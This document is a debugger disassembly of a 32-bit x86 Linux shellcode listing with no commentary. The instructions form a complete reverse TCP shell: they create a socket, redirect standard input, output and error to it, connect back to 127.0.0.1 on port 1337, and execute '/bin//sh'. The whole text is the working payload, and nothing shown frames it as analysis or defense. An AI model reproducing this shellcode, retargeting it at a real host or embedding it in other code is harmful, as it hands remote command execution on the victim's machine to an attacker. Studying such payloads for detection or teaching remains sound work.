0x0804c040 <+0>:	xor    ebx,ebx
0x0804c042 <+2>:	mul    ebx
0x0804c044 <+4>:	push   ebx
0x0804c045 <+5>:	inc    ebx
0x0804c046 <+6>:	push   ebx
0x0804c047 <+7>:	push   0x2
0x0804c049 <+9>:	mov    ecx,esp
0x0804c04b <+11>:	mov    al,0x66
0x0804c04d <+13>:	int    0x80
0x0804c04f <+15>:	xchg   ebx,eax
0x0804c050 <+16>:	pop    ecx
0x0804c051 <+17>:	mov    al,0x3f
0x0804c053 <+19>:	int    0x80
0x0804c055 <+21>:	dec    ecx
0x0804c056 <+22>:	jns    0x804c051 <code+17>
0x0804c058 <+24>:	push   0x100007f
0x0804c05d <+29>:	push   0x39050002
0x0804c062 <+34>:	mov    ecx,esp
0x0804c064 <+36>:	mov    al,0x66
0x0804c066 <+38>:	push   eax
0x0804c067 <+39>:	push   ecx
0x0804c068 <+40>:	push   ebx
0x0804c069 <+41>:	mov    bl,0x3
0x0804c06b <+43>:	mov    ecx,esp
0x0804c06d <+45>:	int    0x80
0x0804c06f <+47>:	push   edx
0x0804c070 <+48>:	push   0x68732f6e
0x0804c075 <+53>:	push   0x69622f2f
0x0804c07a <+58>:	mov    ebx,esp
0x0804c07c <+60>:	push   edx
0x0804c07d <+61>:	push   ebx
0x0804c07e <+62>:	mov    ecx,esp
0x0804c080 <+64>:	mov    al,0xb
0x0804c082 <+66>:	int    0x80
